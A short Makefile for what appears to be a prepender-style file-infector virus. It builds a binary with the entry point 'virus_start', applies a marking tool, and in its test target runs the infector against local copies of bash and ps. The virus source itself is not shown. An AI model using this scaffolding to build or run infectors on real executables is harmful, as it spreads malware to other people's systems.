CFLAGS = -Os -Wall -fno-builtin -nostdlib -fomit-frame-pointer -fno-unit-at-a-time -Wl,-evirus_start -ggdb

all: test

compr: compr.c set_mark
	gcc $(CFLAGS) $(DEFINES) compr.c -o compr
	./set_mark compr

set_mark: ../Prepender/set_mark.c
	$(CC) $< -o $@

test: compr
	cp /bin/bash .
	-./compr
	cp /bin/ps .
	./bash -c exit
	./ps ax

clean:
	-@rm -f set_mark compr bash ps

.PHONY: all clean
